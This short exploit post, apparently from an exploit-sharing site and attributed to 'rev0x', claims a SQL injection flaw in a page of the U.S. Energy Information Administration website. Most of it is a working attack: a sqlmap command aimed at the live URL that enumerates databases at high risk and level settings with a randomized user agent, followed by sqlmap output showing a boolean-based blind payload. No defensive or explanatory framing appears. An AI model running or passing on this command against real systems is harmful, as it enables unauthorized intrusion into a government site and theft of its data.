# Exploit Title : U.S. Energy Information Administration (EIA) SQL Injection
# Author : rev0x
# Date : 05/09/2021
# Tested On : Kali Linux / Windows 10

python sqlmap.py -u "https://www.eia.gov/tools/faqs/faq.php?id=74" --dbs --level=3 --risk=3 --random-agent

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-2170 OR 6693=6693
---